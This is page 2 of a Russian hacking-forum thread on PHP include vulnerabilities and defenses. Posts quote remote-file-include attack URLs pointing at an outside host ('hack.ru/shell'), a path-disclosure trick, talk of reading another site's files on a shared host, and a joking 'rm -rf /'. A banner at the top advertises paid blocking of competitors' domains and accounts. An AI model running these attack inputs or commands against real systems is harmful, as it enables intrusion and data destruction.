УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
PHP-include и способы защиты

Страница 2 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#11

15.11.2008, 10:26

vladim1

Новичок

Регистрация: 12.11.2008

Сообщений: 12

Провел на форуме:
151764

Репутация: -1

обойти /nl,en/ я смог, проблема чтения локальных файлов это

Цитата:

open_basedir restriction

. Меня интересуют файлы другого сайта на этом хосте

#12

15.11.2008, 12:30

bombeg

Участник форума

Регистрация: 27.10.2008

Сообщений: 244

Провел на форуме:
963613

Репутация: 428

Цитата:

Так же рекомендую отредактировать файл php.ini:

и потом не меняя пользователя написать команду rm -rf /

#13

15.11.2008, 12:55

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

Цитата:

Сообщение от vladim1

обойти /nl,en/ я смог, проблема чтения локальных файлов это . Меня интересуют файлы другого сайта на этом хосте

На другие зайти через эту читалку не сможешь, а прочитать все файлы лежащие на этом сайте - без проблем!

#14

15.11.2008, 12:59

vladim1

Новичок

Регистрация: 12.11.2008

Сообщений: 12

Провел на форуме:
151764

Репутация: -1

Прочитал все, везде тупой file() -> echo, не один нормальный include

#15

16.11.2008, 19:37

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Немного доработал статью! Если есть еще какие-либо идеи - пишите, я добавлю!

#16

16.11.2008, 20:00

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Отправить сообщение для [Raz0r] с помощью ICQ

PHP код:


		
			
function stripslashes_for_array(&$a) 

    { 

        foreach($a as $k=>$v) 

        { 

            $a[$k] = stripslashes($v); 

        } 

    } 



    if (!get_magic_quotes_gpc()) 

    { 

        stripslashes_for_array($_POST); 

        stripslashes_for_array($_GET); 

    }

а если передать index.php?file[][][]=lol? раскрытие путей... Нужно рекурсивно вызывать функцию обработки массивов

#17

16.11.2008, 22:40

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Исправлено! Спасибо [Raz0r]

#18

12.02.2009, 17:32

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Зато инклуда не будет))А почему это сработает? Вывода же нет.

#19

17.02.2009, 16:41

cr0w

Познающий

Регистрация: 11.09.2008

Сообщений: 99

Провел на форуме:
2753780

Репутация: 585

Цитата:

Сообщение от _Pantera_

Теперь рассмотрим другой вариант инклуда. На этот раз необходимо, что б в файле php.ini
значение параметра allow_url_fopen было равно On, что и есть по умолчанию.

PHP код:


		
			
<?php

    $f=fopen("$file.php","r");

    

    while (!feof($f))

    {

        $s=fgets($f,255);

        echo $s;

    }

    

    fclose($f);

?>

Из-за того что переменная $file не была определена ранее, злоумышленник может произвести атаку:

Код:

http://site.ru/index.php?file=http://hack.ru/shell

В итоге опять получаем веб-шелл.

Следующий пример - использование функции readfile()

PHP код:


		
			
<?php

    readfile($file); 

?>

Функция readfile() считывает файл, имя которого передано ей в качестве параметра, и выводит его содержимое на экран.
В итоге опять получаем веб-шелл:

Код:

http://site.ru/index.php?file=http://hack.ru/shell

Теперь рассмотрим такой вариант:

PHP код:


		
			
<?php  

    echo implode("", file($file));

?>

С помощью функции implode() мы объединяем элементы массива в строку, а с помощью функции file() получаем содержимое файла в виде массива. В итоге опять имеем веб-шелл:

Код:

http://site.ru/index.php?file=http://hack.ru/shell.php

Эээ, а где тут "мы имеем веб-шелл"? Без eval'a заместо echo тут нигде не получишь шелла...

#20

17.02.2009, 19:12

Qwazar

Leaders of Antichat - Level 4

Регистрация: 02.06.2005

Сообщений: 1,411

Провел на форуме:
10605912

Репутация: 4693

Цитата:

Сообщение от ChaaK

странно, но работает o_O

Не тупи, это просто читалка, ты просто не делай file=http://test1.ru/shell.php а сделай shell.txt . Т.к. в первом случае ты просто выводишь на экран результат работы того файла на том сервере, а не запускаешь его код.

З.Ы.
jokester спс.

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 17.02.2009 в 19:21..

Страница 2 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books PHP	FRAGNATIC	PHP, PERL, MySQL, JavaScript	186	21.02.2010 02:41
Local include && PHP	baz1k	Чужие Статьи	0	10.01.2008 04:50
Что такое Php?	PAPA212	Болталка	13	28.12.2007 20:44
Безопасность в Php, Часть Iii	k00p3r	Чужие Статьи	0	11.07.2005 19:02
Защищаем Php. Шаг за шагом.	k00p3r	Чужие Статьи	0	13.06.2005 11:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход